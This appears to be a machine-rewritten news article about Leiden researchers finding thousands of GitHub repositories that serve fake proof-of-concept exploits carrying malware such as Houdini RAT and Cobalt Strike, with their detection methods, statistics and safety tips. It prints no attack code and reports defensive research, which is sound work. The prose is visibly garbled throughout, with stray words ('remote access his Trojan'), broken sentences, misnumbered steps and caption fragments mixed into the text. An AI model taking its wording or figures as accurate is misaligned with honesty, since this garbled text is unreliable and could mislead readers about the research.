Thumbnail 3 600x397 1

Thousands of GitHub Repositories Deliver Fake PoC Exploits with Malware

Researchers at the Leiden Institute of Advanced Computer Science have discovered thousands of repositories on GitHub that provide fake proof-of-concept (PoC) exploits for various vulnerabilities, including some malware.

GitHub is one of the largest code-hosting platforms he uses, which researchers use to publish his PoC exploits so that the security community can review fixes for vulnerabilities and assess the impact and scope of bugs. It is useful for judging

Leiden Institute of Advanced Computer Science researcher Technical According to his paper, the odds of getting infected with malware instead of receiving a PoC are up to 10.3%, excluding proven fakes and pranks.

Data Collection and Analysis

Researchers analyzed over 47,300 repositories facilitating the exploitation of exposed vulnerabilities between 2017 and 2021 using his three mechanisms:

  • IP address analysis: comparing the PoC’s publisher IP to public blocklists and VT and AbuseIPDB.
  • Binary analysis: run VirusTotal checks on the provided executables and their hashes.
  • Hexadecimal and Base64 analysis: decode obfuscated files before performing binary and IP checks.

Of the 150,734 unique IPs extracted, of the 2,864 matching blocklist entries, 1,522 were detected as malicious by Virus Total’s virus scans, of which 1,069 were in the AbuseIPDB database. was doing.

Binary analysis examined a set of 6,160 executables, revealing a total of 2,164 malicious samples hosted in 1,398 repositories. A total of 4,893 out of 47,313 repositories tested were classified as malicious, with most vulnerabilities impacting in 2020. However, the researcher has shared with BleepingComputer and at least 60 other samples that are still active that he is in the process of removing from GitHub.

PoC Malware

Upon closer inspection of some of these cases, researchers found a number of different malware and malicious scripts, ranging from remote access his Trojan to his Cobalt Strike did.

An interesting case is the PoC case for CVE-2019-0708 (aka “BlueKeep”). It contains a Base64 obfuscated Python script that calls VBScript from Pastebin.

Script is Houdini RAT. This is a traditional JavaScript-based Trojan that supports remote command execution via Windows CMD.

In another case, researchers discovered a fake PoC, an information-stealing program that collects system information, IP addresses, and user agents.

This was previously created by another researcher as a security experiment, so finding it with an automated tool confirmed the researchers that their approach worked.

One of his researchers, a security researcher El Yadmani Soufian provide other examples that are not included in his technical report. In base64 flagged as malicious by Virus Total.

Python PoC with a one-liner to decrypt a base64-encoded payload flagged as malicious by Virus Total.

Fake BlueKeep exploit. Contains an executable file flagged as malicious by most antivirus engines and identified as Cobalt Strike.

A script hidden in a fake PoC with an inactive malicious component that can do harm if the author wishes.

How to stay safe

Blindly trusting GitHub repositories from unverified sources is a bad idea. The content is unmoderated, so it’s up to you to review it before using it.

Software testers are advised to review the downloaded PoC carefully and run as many tests as possible before executing.

Soufian believes that all testers should follow these three steps.

  1. If the code is too obfuscated and takes too long to manually analyze, put it in a sandbox environment (such as an isolated virtual machine) and scan the network for suspicious traffic .
  2. Analyze the binary using an open source intelligence tool such as VirusTotal.
    Researchers reported all malicious repositories they found to
  3. GitHub, but many are still public because it takes time to review and remove them all.

As Soufian explained, their research not only serves as a one-time cleanup action on GitHub, but also leads to automation that can be used to flag malicious instructions in uploaded code. It is intended to act as a trigger for the development of a tailored solution.

This is the first version of the team’s research and they are working on improving the detector. Detection tools now miss code with stronger obfuscation.

Leave a Comment

Your email address will not be published.